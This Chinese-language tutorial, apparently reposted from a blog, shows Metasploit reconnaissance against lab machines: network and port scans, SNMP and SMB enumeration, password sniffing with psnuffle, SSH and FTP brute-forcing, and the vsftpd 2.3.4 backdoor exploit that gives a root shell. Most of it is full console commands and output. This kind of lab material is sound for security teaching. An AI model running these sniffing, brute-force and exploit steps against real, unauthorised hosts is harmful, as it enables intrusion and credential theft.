网络安全学习之利用Metasploit举行信息网络
基于TCP协议网络主机信息利用Metsploit中的nmap 和arp_sweep 网络主机信息
msf中也有类似nmap功能的工具,名字是 db_nmap,用法同 nmap一样,如下所示:
msf6 > db_nmap -sS 192.168.1.106### SYN扫描,用法同nmap里的nmap -sS 192.168.1.106
[*] Nmap: Starting Nmap 7.93 ( https://nmap.org ) at 2024-08-03 16:12 CST
[*] Nmap: Nmap scan report for 192.168.1.106
[*] Nmap: Host is up (0.00019s latency).
[*] Nmap: Not shown: 995 closed tcp ports (reset)
[*] Nmap: PORT STATE SERVICE
[*] Nmap: 22/tcp openssh
[*] Nmap: 88/tcp openkerberos-sec
[*] Nmap: 3031/tcp openeppc
[*] Nmap: 3283/tcp opennetassistant
[*] Nmap: 5900/tcp openvnc
[*] Nmap: MAC Address: 78:4F:43:5A:47:FD (Apple)
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 0.54 seconds
ARP扫描
msf6 > use auxiliary/scanner/discovery/arp_sweep## 使用辅助模块中的arp扫描器
msf6 auxiliary(scanner/discovery/arp_sweep) > show options ##查看配置信息
Module options (auxiliary/scanner/discovery/arp_sweep):
Name Current SettingRequiredDescription
---- ----------------------------------
INTERFACE no The name of the interface
RHOSTS yes The target host(s), see https://github.com/rap
id7/metasploit-framework/wiki/Using-Metasploit
SHOST no Source IP Address ### 可伪造的源ip地址
SMAC no Source MAC Address### 可伪造的源MAC地址
THREADS 1 yes The number of concurrent threads (max one per
host)
TIMEOUT 5 yes The number of seconds to wait for new data
msf6 auxiliary(scanner/discovery/arp_sweep) > set RHOSTs 192.168.1.0/24 ### 设置要扫描的网络
RHOSTs => 192.168.1.0/24
msf6 auxiliary(scanner/discovery/arp_sweep) > set THREADS 10 ##设置线程数
THREADS => 10
msf6 auxiliary(scanner/discovery/arp_sweep) > show options
Module options (auxiliary/scanner/discovery/arp_sweep):
Name Current SettingRequiredDescription
---- ----------------------------------
INTERFACE no The name of the interface
RHOSTS 192.168.1.0/24 yes The target host(s), see https://github.com/rap
id7/metasploit-framework/wiki/Using-Metasploit
SHOST no Source IP Address
SMAC no Source MAC Address
THREADS 10 yes The number of concurrent threads (max one per
host)
TIMEOUT 5 yes The number of seconds to wait for new data
msf6 auxiliary(scanner/discovery/arp_sweep) > run
[+] 192.168.1.1 appears to be up (UNKNOWN).
wc[+] 192.168.1.103 appears to be up (UNKNOWN).
[+] 192.168.1.104 appears to be up (UNKNOWN).
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/discovery/arp_sweep) > back
利用半连接方式扫描 tcp端口
msf6 > search portscan
Matching Modules
================
#Name Disclosure DateRank CheckDescription
----- ------------------- ----------------
0auxiliary/scanner/portscan/ftpbounce normalNo FTP Bounce Port Scanner ##FTP端口扫描
1auxiliary/scanner/natpmp/natpmp_portscan normalNo NAT-PMP External Port Scanner
2auxiliary/scanner/sap/sap_router_portscanner normalNo SAPRouter Port Scanner
3auxiliary/scanner/portscan/xmas normalNo TCP "XMas" Port Scanner
4auxiliary/scanner/portscan/ack normalNo TCP ACK Firewall Scanner ## ACK防火墙扫描
5auxiliary/scanner/portscan/tcp normalNo TCP Port Scanner ### TCP端口扫描
6auxiliary/scanner/portscan/syn normalNo TCP SYN Port Scanner ## SYN 端口扫描
7auxiliary/scanner/http/wordpress_pingback_access normalNo Wordpress Pingback Locator
msf6 > use auxiliary/scanner/portscan/syn
msf6 auxiliary(scanner/portscan/tcp) > show options
Module options (auxiliary/scanner/portscan/tcp):
Name Current SettingRequiredDescription
---- ----------------------------------
CONCURRENCY10 yes The number of concurrent ports to check per host
DELAY 0 yes The delay between connections, per thread, in milliseconds
JITTER 0 yes The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds.
PORTS 1-10000 yes Ports to scan (e.g. 22-25,80,110-900)
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
THREADS 1 yes The number of concurrent threads (max one per host)
TIMEOUT 1000 yes The socket connect timeout in milliseconds
View the full module info with the info, or info -d command.
msf6 auxiliary(scanner/portscan/tcp) > set RHOSTS 192.168.1.1
RHOSTS => 192.168.1.1/24
msf6 auxiliary(scanner/portscan/tcp) > set THREADS 10
ThreADS => 10
msf6 auxiliary(scanner/portscan/tcp) > exploit
利用 auxiliary /sniffer 下的 psnuffle 模块举行暗码嗅探
原理:截获常见协议 ftp、imap、pop3、smb、url等身份认证过程,记任命户名和暗码。
过程
利用lftp下令连接靶机上的ftp服务
┌──(root㉿kali)-[~]
└─# lftp -u msfadmin:msfadmin 192.168.1.102 -p 21
msf6 > useauxiliary/sniffer/psnuffle
msf6 auxiliary(sniffer/psnuffle) > info## 查看该模块信息
Name: pSnuffle Packet Sniffer
Module: auxiliary/sniffer/psnuffle
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
Max Moser <mmo@remote-exploit.org>
Available actions:### 可执行的动作
Name Description
---- -----------
List List protocols ### 列出支持的协议
SnifferRun sniffer ### 运行 sniffer
Check supported:
No
Basic options:
Name Current SettingRequiredDescription
---- ----------------------------------
FILTER no The filter string for capturing traffic
INTERFACE no The name of the interface
PCAPFILE no The name of the PCAP capture file to process
PROTOCOLSall yes A comma-delimited list of protocols to sniff or "all".
SNAPLEN 65535 yes The number of bytes to capture
TIMEOUT 500 yes The number of seconds to wait for new data
Description:
This module sniffs passwords like dsniff did in the past##这个 psnuffle 模块可以像以前的 dsniff 命令一样,去嗅探密码,只支持 pop3、imap、ftp、HTTP GET 协议。
## Dsniff 是一个著名的网络嗅探工具包、高级口令嗅探工具、综合性的网络嗅探工具包
View the full module info with the info -d command.
msf6 auxiliary(sniffer/psnuffle) > list
[*] Loaded protocol FTP from /usr/share/metasploit-framework/data/exploits/psnuffle/ftp.rb...
[*] Loaded protocol IMAP from /usr/share/metasploit-framework/data/exploits/psnuffle/imap.rb...
[*] Loaded protocol POP3 from /usr/share/metasploit-framework/data/exploits/psnuffle/pop3.rb...
[*] Loaded protocol SMB from /usr/share/metasploit-framework/data/exploits/psnuffle/smb.rb...
[*] Loaded protocol URL from /usr/share/metasploit-framework/data/exploits/psnuffle/url.rb...
[*] Protocols: ftp, imap, pop3, smb, url
[*] Auxiliary module execution completed
msf6 auxiliary(sniffer/psnuffle) > sniffer
[*] Successful FTP Login: 192.168.1.188:52004-192.168.1.102:21 >> msfadmin / msfadmin## 获取ftp登录的账号密码
基于snmp协议网络信息
必要先修改靶机上的snmp服务配置,因为snmp服务默认是不对外开放的
root@metasploitable:~# vim /etc/default/snmpd
找到下面这一行
SNMPDOPTS='-Lsd -Lf /dev/null -u snmp -I -smux -p /var/run/snmpd.pid 127.0.0.1'
将下面行中的 127.0.0.1 修改为 0.0.0.0
SNMPDOPTS='-Lsd -Lf /dev/null -u snmp -I -smux -p /var/run/snmpd.pid 0.0.0.0'
修改完后,保存退出,并重启snmpd服务
root@metasploitable:~# /etc/init.d/snmpd restart
Restarting network management services: snmpd.
root@metasploitable:~#
实战-利用 snmp_enum 模块通过 snmp 协议扫描目的服务器信息
snmp_enum 是一个强盛的snmp枚举工具,可以允许用户分析一个网络所有的snmp信息传输
msf6 > use auxiliary/scanner/snmp/snmp_enum
msf6 auxiliary(scanner/snmp/snmp_enum) > info
Name: SNMP Enumeration Module
Module: auxiliary/scanner/snmp/snmp_enum
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
Matteo Cantoni <goony@nothink.org>
Check supported:
No
Basic options:
Name Current SettingRequiredDescription
---- ----------------------------------
COMMUNITYpublic yes SNMP Community String
RETRIES 1 yes SNMP Retries
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 161 yes The target port (UDP)
THREADS 1 yes The number of concurrent threads (max one per host)
TIMEOUT 1 yes SNMP Timeout
VERSION 1 yes SNMP Version <1/2c>
Description:
This module allows enumeration of any devices with SNMP protocol
support. It supports hardware, software, and network information.
The default community used is "public".
References:
https://en.wikipedia.org/wiki/Simple_Network_Management_Protocol
https://net-snmp.sourceforge.io/docs/man/snmpwalk.html
http://www.nothink.org/codes/snmpcheck/index.php
View the full module info with the info -d command.
msf6 auxiliary(scanner/snmp/snmp_enum) > set rhosts 192.168.1.102
rhosts => 192.168.1.102
https://i-blog.csdnimg.cn/blog_migrate/0bf4d8326b56212ad9b0498d8475bbaf.png
扩展
其他好用的snmp枚举工具
SNMP 枚举工具snmpwalk
snmpwalk是一个SNMP应用步伐。它利用SNMP的GETNEXT哀求,查询指定的所有OID(SNMP协议中的对象标识)树信息,并表现给用户。
a) –h 显示帮助
b) –v 1|2c|3 指定SNMP协议版本
c) –V 显示当前SNMPWALK命令行版本
d) –r RETRIES 指定重试次数,默认为0次。
e) –t TIMEOUT 指定每次请求的等待超时时间,单为秒,默认为3秒。
f) –Cc 指定当在WALK时,如果发现OID负增长将是否继续WALK。
2. V1、V2C选项
a) –c COMMUNITY 指定共同体字符串
3. V3选项
a) –l LEVEL 指定安全级别:noAuthNoPriv|authNoPriv|authPriv
b) –u USER-NAME 安全名字
c) –a PROTOCOL 验证协议:MD5|SHA。如果-l指定为authNoPriv或authPriv时才需要。
d) –A PASSPHRASE 验证字符串。如果-l指定为authNoPriv或authPriv时才需要。
e) –x PROTOCOL 加密协议:DES。如果-l指定为authPriv时才需要。
f) –X PASSPHRASE 加密字符串:如果-l指定为authPriv时才需要。
SNMP 枚举工具snmpcheck
基于SMB协议网络信息
SMB概述:服务器消息块(Server Message Block),又称为网络文件共享系统(Common Internet File System) ,一种应用层网络传输协议,由微软开辟,主要功能是是网络上的呆板可以或许共享盘算机文件、打印机、串行端口和通讯等资源。
经过unix服务器厂商重新开辟后,它可用于连接unix和windows客户机,实验打印和文件共享等任务。
利用 smb_version 基于 SMB 协议扫描版本号
msf6 > search smb_version
Matching Modules
================
#Name Disclosure DateRank CheckDescription
----- ------------------- ----------------
0auxiliary/scanner/smb/smb_version normalNo SMB Version Detection
Interact with a module by name or index. For example info 0, use 0 or use auxiliary/scanner/smb/smb_version
msf6 > use 0
msf6 auxiliary(scanner/smb/smb_version) > show options
Module options (auxiliary/scanner/smb/smb_version):
Name Current SettingRequiredDescription
---- ----------------------------------
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
THREADS1 yes The number of concurrent threads (max one per host)
View the full module info with the info, or info -d command.
### 注意: 设置多个目标,中间用逗号隔开,且逗号与后一个目标之间要有空格隔开。
msf6 auxiliary(scanner/smb/smb_version) > set rhosts 192.168.1.102, 192.168.1.97
rhosts => 192.168.1.102, 192.168.1.97
msf6 auxiliary(scanner/smb/smb_version) > exploit
[*] 192.168.1.102:445 - SMB Detected (versions:1) (preferred dialect:) (signatures:optional)
[*] 192.168.1.102:445 - Host could not be identified: Unix (Samba 3.0.20-Debian)
[*] Scanned 1 of 2 hosts (50% complete)
[*] 192.168.1.97:445 - SMB Detected (versions:2, 3) (preferred dialect:SMB 3.0.2) (signatures:required) (guid:{528e1363-aea8-895a-94a1-b960f94f7bf5}) (authentication domain:MACBOOK-PRO)
[*] Scanned 2 of 2 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_version) >
https://i-blog.csdnimg.cn/blog_migrate/97da11cda1829a47b7d59b0987ea09db.png
利用 smb_enumshares 基于 SMB 协议扫共享文件(账号、暗码)
SMB 的模块中根本上都是可以配置用户名和暗码的,配置了用户名和暗码某些模块扫描的结果会更满足我们的需求。
https://i-blog.csdnimg.cn/blog_migrate/f3affddeb9d5cc6e31d29d4295fe4051.pnghttps://i-blog.csdnimg.cn/blog_migrate/4c9a68f389ae8c5d659d38c82484b9ab.png
https://i-blog.csdnimg.cn/blog_migrate/637d2c9523ec918df0e1a9ac853ea4f2.png
msf6 > search enumshares
Matching Modules
================
#Name Disclosure DateRank CheckDescription
----- ------------------- ----------------
0auxiliary/scanner/smb/smb_enumshares normalNo SMB Share Enumeration
1auxiliary/scanner/snmp/snmp_enumshares normalNo SNMP Windows SMB Share Enumeration
Interact with a module by name or index. For example info 1, use 1 or use auxiliary/scanner/snmp/snmp_enumshares
msf6 > use auxiliary/scanner/smb/smb_enumshares
msf6 auxiliary(scanner/smb/smb_enumshares) > show options
Module options (auxiliary/scanner/smb/smb_enumshares):
Name Current Setting RequiredDescription
---- --------------- -------------------
HIGHLIGHT_NAME_PATTERNusername|password|user|pass|Groups.xmlyes PCRE regex of resource names to highlight
LogSpider 3 no 0 = disabled, 1 = CSV, 2 = table (txt), 3 = one liner (txt) (Accepted: 0, 1, 2, 3)
MaxDepth 999 yes Max number of subdirectories to spider
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
Share no Show only the specified share
ShowFiles false yes Show detailed information when spidering
SpiderProfiles true no Spider only user profiles when share is a disk share
SpiderShares false no Spider shares recursively
THREADS 1 yes The number of concurrent threads (max one per host)
View the full module info with the info, or info -d command.
msf6 auxiliary(scanner/smb/smb_enumshares) > set rhosts 192.168.1.89
rhosts => 192.168.1.89
msf6 auxiliary(scanner/smb/smb_enumshares) > set SMBuser chao
SMBuser => chao
msf6 auxiliary(scanner/smb/smb_enumshares) > set smbpass 123456
smbpass => 123456
msf6 auxiliary(scanner/smb/smb_enumshares) > exploit
[*] 192.168.1.89:139 - Starting module
[-] 192.168.1.89:139 - Login Failed: The SMB server did not reply to our request
[*] 192.168.1.89:445 - Starting module
[!] 192.168.1.89:445 - peer_native_os is only available with SMB1 (current version: SMB3)
[!] 192.168.1.89:445 - peer_native_lm is only available with SMB1 (current version: SMB3)
[+] 192.168.1.89:445 - ADMIN$ - (DISK|SPECIAL) 远程管理
[+] 192.168.1.89:445 - C$ - (DISK|SPECIAL) 默认共享
[+] 192.168.1.89:445 - IPC$ - (IPC|SPECIAL) 远程 IPC
[+] 192.168.1.89:445 - Users - (DISK)
[+] 192.168.1.89:445 - wangdada - (DISK)
[*] 192.168.1.89: - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
####可以看到有 1 个是我们前面设置的 xuegod 共享文件目录还有 3 个是隐藏的共享目录。
利用 smb_lookupsid 扫描系统用户信息(SID 枚举)
win7中新建一个用户(本实验为win10系统),
右键此电脑→管理→本地用户和组→用户 ,在空缺处,右击新建一个用户
用户: admin 暗码: 123456
如下图所示设置admin用户属性
https://i-blog.csdnimg.cn/blog_migrate/8ef0ad5af9c43459ba1da007644873b3.png
msf6 > search smb_lookupsid
Matching Modules
================
#Name Disclosure DateRank CheckDescription
----- ------------------- ----------------
0auxiliary/admin/mssql/mssql_enum_domain_accounts_sqli normalNo Microsoft SQL Server SQLi SUSER_SNAME Windows Domain Account Enumeration
1auxiliary/admin/mssql/mssql_enum_domain_accounts normalNo Microsoft SQL Server SUSER_SNAME Windows Domain Account Enumeration
2auxiliary/scanner/smb/smb_lookupsid normalNo SMB SID User Enumeration (LookupSid)
Interact with a module by name or index. For example info 2, use 2 or use auxiliary/scanner/smb/smb_lookupsid
msf6 > use auxiliary/scanner/smb/smb_lookupsid
msf6 auxiliary(scanner/smb/smb_lookupsid) > show options
Module options (auxiliary/scanner/smb/smb_lookupsid):
Name Current SettingRequiredDescription
---- ----------------------------------
MaxRID 4000 no Maximum RID to check
MinRID 500 no Starting RID to check
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
SMBDomain. no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
THREADS 1 yes The number of concurrent threads (max one per host)
Auxiliary action:
Name Description
---- -----------
LOCALEnumerate local accounts
View the full module info with the info, or info -d command.
msf6 auxiliary(scanner/smb/smb_lookupsid) > set rhosts 192.168.1.89
rhosts => 192.168.1.89
msf6 auxiliary(scanner/smb/smb_lookupsid) > set smbuser admin
smbuser => admin
msf6 auxiliary(scanner/smb/smb_lookupsid) > set smbpass 123456
smbpass => 123456
msf6 auxiliary(scanner/smb/smb_lookupsid) > exploit
[*] 192.168.1.89:445 - PIPE(LSARPC) LOCAL(DESKTOP-2T86P3T - 5-21-2620834448-3206096960-2066338221) DOMAIN(WORKGROUP - )
[*] 192.168.1.89:445 - USER=Administrator RID=500
[*] 192.168.1.89:445 - USER=Guest RID=501
[*] 192.168.1.89:445 - USER=DefaultAccount RID=503
[*] 192.168.1.89:445 - USER=WDAGUtilityAccount RID=504
[*] 192.168.1.89:445 - GROUP=None RID=513
[*] 192.168.1.89:445 - USER=chao RID=1001
[*] 192.168.1.89:445 - USER=admin RID=1002
[*] 192.168.1.89:445 - DESKTOP-2T86P3T
[*] 192.168.1.89: - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
基于 SSH 协议网络信息
查看ssh版本信息
msf6 > use auxiliary/scanner/ssh/ssh_version
msf6 auxiliary(scanner/ssh/ssh_version) > show options
Module options (auxiliary/scanner/ssh/ssh_version):
Name Current SettingRequiredDescription
---- ----------------------------------
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 22 yes The target port (TCP)
THREADS1 yes The number of concurrent threads (max one per host)
TIMEOUT30 yes Timeout for the SSH probe
View the full module info with the info, or info -d command.
msf6 auxiliary(scanner/ssh/ssh_version) > set RhOSTS 192.168.1.102
RhOSTS => 192.168.1.102
msf6 auxiliary(scanner/ssh/ssh_version) > exploit
https://i-blog.csdnimg.cn/blog_migrate/8586a8b6f6b1db938534c4427e2c161d.png
暴力破解ssh
msf6 > use auxiliary/scanner/ssh/ssh_login
msf6 auxiliary(scanner/ssh/ssh_login) > show options
msf auxiliary(scanner/ssh/ssh_version) > set RHOSTS 192.168.1.102
## 设置字典文件默认的字典文件是不满足实际需求的后期我们使用更强大的字典文件。
msf6 auxiliary(scanner/ssh/ssh_login) > set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/root_userpass.txt
## 因为字典文件中不包含我们的用户密码信息我们把自己的密码信息手动加入进去以便展示效果
## 新开一个终端窗口
┌──(root㉿kali)-
└─# echo "msfadmin msfadmin" >> /usr/share/metasploit-framework/data/wordlists/root_userpass.txt
https://i-blog.csdnimg.cn/blog_migrate/c3311e58b548595b739021f92522c854.png
ssh 暴力破解后,会自动建立与目的机的链接,可以通过sessions下令查看
https://i-blog.csdnimg.cn/blog_migrate/e51f7a8e8c69efc32a8e1910fec56685.png
基于 FTP 协议网络信息
查看 ftp 服务的版本信息
加载 ftp 服务版本扫描模块
msf6 > use auxiliary/scanner/ftp/ftp_version
msf6 auxiliary(scanner/ftp/ftp_version) > show options
Module options (auxiliary/scanner/ftp/ftp_version):
Name Current Setting RequiredDescription
---- --------------- -------------------
FTPPASSmozilla@example.comno The password for the specified username
FTPUSERanonymous no The username to authenticate as
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/
wiki/Using-Metasploit
RPORT 21 yes The target port (TCP)
THREADS1 yes The number of concurrent threads (max one per host)
View the full module info with the info, or info -d command.
msf6 auxiliary(scanner/ftp/ftp_version) > set rhosts 192.168.1.102
rhosts => 192.168.1.102
msf6 auxiliary(scanner/ftp/ftp_version) > exploit
[+] 192.168.1.102:21 - FTP Banner: '220 (vsFTPd 2.3.4)\x0d\x0a'
[*] 192.168.1.102:21 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/ftp/ftp_version) > back
扫描出 ftp 服务的版本号,我们可以尝试搜索版本号,看看有没有可以利用的模块
msf6 > search 2.3.4
https://i-blog.csdnimg.cn/blog_migrate/da534eaf54ddf9ef666a4e5cfd464e46.png
大概搜索 vsftpd
msf6 > search vsftpd
https://i-blog.csdnimg.cn/blog_migrate/d582538a111e6f3ce57f3440ea4ca53b.png
我们发现存在一个 exploit 模块,而且这个版本的 ftp 服务存在一个后门
我们尝试利用下这个模块
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
[*] No payload configured, defaulting to cmd/unix/interact
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show options
Module options (exploit/unix/ftp/vsftpd_234_backdoor):
Name Current SettingRequiredDescription
---- ----------------------------------
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/
Using-Metasploit
RPORT 21 yes The target port (TCP)
Payload options (cmd/unix/interact):
NameCurrent SettingRequiredDescription
--------------------------------------
Exploit target:
IdName
------
0 Automatic
View the full module info with the info, or info -d command.
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set rhosts 192.168.1.102
rhosts => 192.168.1.102
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit
[*] 192.168.1.102:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 192.168.1.102:21 - USER: 331 Please specify the password.
[+] 192.168.1.102:21 - Backdoor service has been spawned, handling...
[+] 192.168.1.102:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 3 opened (192.168.1.188:46221 -> 192.168.1.102:6200) at 2022-11-25 23:10:07 +0800
https://i-blog.csdnimg.cn/blog_migrate/809e7e57b707eae470fccb35cfa97ee6.png
拿到了目的主机的shell,而且是root权限。
ftp 匿名登录扫描
msf6 > use auxiliary/scanner/ftp/anonymous
msf6 auxiliary(scanner/ftp/anonymous) > show options
Module options (auxiliary/scanner/ftp/anonymous):
Name Current Setting RequiredDescription
---- --------------- -------------------
FTPPASSmozilla@example.comno The password for the specified username
FTPUSERanonymous no The username to authenticate as
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/
wiki/Using-Metasploit
RPORT 21 yes The target port (TCP)
THREADS1 yes The number of concurrent threads (max one per host)
View the full module info with the info, or info -d command.
msf6 auxiliary(scanner/ftp/anonymous) > set rhosts 192.168.1.102
rhosts => 192.168.1.102
msf6 auxiliary(scanner/ftp/anonymous) > exploit
[+] 192.168.1.102:21 - 192.168.1.102:21 - Anonymous READ (220 (vsFTPd 2.3.4))
[*] 192.168.1.102:21 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/ftp/anonymous) >
ftp暴力破解
msf6 > search ftp_login
Matching Modules
================
#Name Disclosure DateRank CheckDescription
----- ------------------- ----------------
0auxiliary/scanner/ftp/ftp_login normalNo FTP Authentication Scanner
Interact with a module by name or index. For example info 0, use 0 or use auxiliary/scanner/ftp/ftp_login
msf6 > use auxiliary/scanner/ftp/ftp_login
msf6 auxiliary(scanner/ftp/ftp_login) > show options
Module options (auxiliary/scanner/ftp/ftp_login):
Name Current SettingRequiredDescription
---- ----------------------------------
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
DB_SKIP_EXISTINGnone no Skip existing credentials stored in the current database (Accepted
: none, user, user&realm)
PASSWORD no A specific password to authenticate with
PASS_FILE no File containing passwords, one per line
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RECORD_GUEST false no Record anonymous/guest logins to the database
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-frame
work/wiki/Using-Metasploit
RPORT 21 yes The target port (TCP)
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads (max one per host)
USERNAME no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair p
er line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
VERBOSE true yes Whether to print output for all attempts
View the full module info with the info, or info -d command.
msf6 auxiliary(scanner/ftp/ftp_login) > set rhosts 192.168.1.102
rhosts => 192.168.1.102
msf6 auxiliary(scanner/ftp/ftp_login) > set userpass_file /usr/share/metasploit-framework/data/wordlists/root_userpass.txt
userpass_file => /usr/share/metasploit-framework/data/wordlists/root_userpass.txt
msf6 auxiliary(scanner/ftp/ftp_login) > exploit
[*] 192.168.1.102:21 - 192.168.1.102:21 - Starting FTP login sweep
[-] 192.168.1.102:21 - 192.168.1.102:21 - LOGIN FAILED: root: (Incorrect: )
[+] 192.168.1.102:21 - 192.168.1.102:21 - Login Successful: msfadmin:msfadmin
[-] 192.168.1.102:21 - 192.168.1.102:21 - LOGIN FAILED: root:123456 (Incorrect: )
[-] 192.168.1.102:21 - 192.168.1.102:21 - LOGIN FAILED: root:!root (Incorrect: )
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
页:
[1]